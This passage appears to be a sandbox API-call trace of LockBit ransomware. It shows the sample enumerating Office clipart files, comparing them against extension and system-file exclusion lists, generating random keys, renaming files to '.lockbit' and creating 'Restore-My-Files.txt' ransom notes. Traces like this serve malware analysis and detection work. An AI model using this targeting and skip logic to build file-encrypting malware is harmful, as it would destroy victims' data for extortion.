NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.232] malloc (_Size=0xa6) returned 0x77d800 [0109.232] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0109.236] free (_Block=0x77d800) [0109.236] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00923_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.236] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.236] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.236] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f7031f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4c14, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00932_.WMF", cAlternateFileName="")) returned 1 [0109.236] lstrcmpiW (lpString1=".", lpString2="BL00932_.WMF") returned -1 [0109.236] lstrcmpiW (lpString1="..", lpString2="BL00932_.WMF") returned -1 [0109.236] PathFindExtensionW (pszPath="BL00932_.WMF") returned=".WMF" [0109.236] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.236] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.237] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.237] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00932_.WMF") returned 1 [0109.238] lstrcmpiW (lpString1="ntldr", lpString2="BL00932_.WMF") returned 1 [0109.238] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00932_.WMF") returned 1 [0109.238] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00932_.WMF") returned 1 [0109.238] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00932_.WMF") returned -1 [0109.238] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00932_.WMF") returned 1 [0109.238] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00932_.WMF") returned 1 [0109.238] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.238] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF") returned=".WMF" [0109.238] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.238] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.238] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.239] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.239] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.239] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.239] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.239] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.239] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.239] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.239] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.239] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.239] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.239] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.239] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.239] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.239] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.239] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF.lockbit") returned 72 [0109.239] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00932_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.241] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.241] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.241] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=19476) returned 1 [0109.241] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.242] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.242] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.242] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.242] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.242] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.248] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.248] malloc (_Size=0xa6) returned 0x77d800 [0109.249] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0109.249] free (_Block=0x77d800) [0109.249] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00932_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.249] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.249] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.249] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7d46d00, ftCreationTime.dwHighDateTime=0x1bd4bee, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe7d46d00, ftLastWriteTime.dwHighDateTime=0x1bd4bee, nFileSizeHigh=0x0, nFileSizeLow=0xeb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00985_.WMF", cAlternateFileName="")) returned 1 [0109.249] lstrcmpiW (lpString1=".", lpString2="BL00985_.WMF") returned -1 [0109.249] lstrcmpiW (lpString1="..", lpString2="BL00985_.WMF") returned -1 [0109.249] PathFindExtensionW (pszPath="BL00985_.WMF") returned=".WMF" [0109.249] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.249] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.249] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.249] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.249] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.249] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.249] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.249] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.249] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.249] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.249] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.249] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.249] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.249] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.249] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.249] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.249] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.249] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.250] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.250] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00985_.WMF") returned 1 [0109.250] lstrcmpiW (lpString1="ntldr", lpString2="BL00985_.WMF") returned 1 [0109.250] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00985_.WMF") returned 1 [0109.250] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00985_.WMF") returned 1 [0109.251] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00985_.WMF") returned -1 [0109.251] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00985_.WMF") returned 1 [0109.251] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00985_.WMF") returned 1 [0109.251] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.251] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF") returned=".WMF" [0109.251] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.251] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.251] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.252] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.252] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.252] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF.lockbit") returned 72 [0109.252] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00985_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.252] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.252] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.252] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3768) returned 1 [0109.252] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.253] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.253] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.253] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.253] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.258] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.259] malloc (_Size=0xa6) returned 0x77d800 [0109.259] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0109.259] free (_Block=0x77d800) [0109.259] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00985_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.259] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.259] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.259] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6849b000, ftCreationTime.dwHighDateTime=0x1bd0318, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6849b000, ftLastWriteTime.dwHighDateTime=0x1bd0318, nFileSizeHigh=0x0, nFileSizeLow=0xd16, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOAT.WMF", cAlternateFileName="")) returned 1 [0109.259] lstrcmpiW (lpString1=".", lpString2="BOAT.WMF") returned -1 [0109.259] lstrcmpiW (lpString1="..", lpString2="BOAT.WMF") returned -1 [0109.259] PathFindExtensionW (pszPath="BOAT.WMF") returned=".WMF" [0109.259] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.259] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.259] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.259] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.259] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.259] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.259] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.259] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.259] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.259] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.259] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.259] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.259] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.259] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.259] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.259] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.260] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.260] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BOAT.WMF") returned 1 [0109.260] lstrcmpiW (lpString1="ntldr", lpString2="BOAT.WMF") returned 1 [0109.261] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BOAT.WMF") returned 1 [0109.261] lstrcmpiW (lpString1="bootsect.bak", lpString2="BOAT.WMF") returned 1 [0109.261] lstrcmpiW (lpString1="autorun.inf", lpString2="BOAT.WMF") returned -1 [0109.261] lstrcmpiW (lpString1="thumbs.db", lpString2="BOAT.WMF") returned 1 [0109.261] lstrcmpiW (lpString1="iconcache.db", lpString2="BOAT.WMF") returned 1 [0109.261] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.261] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF") returned=".WMF" [0109.261] lstrcmpiW 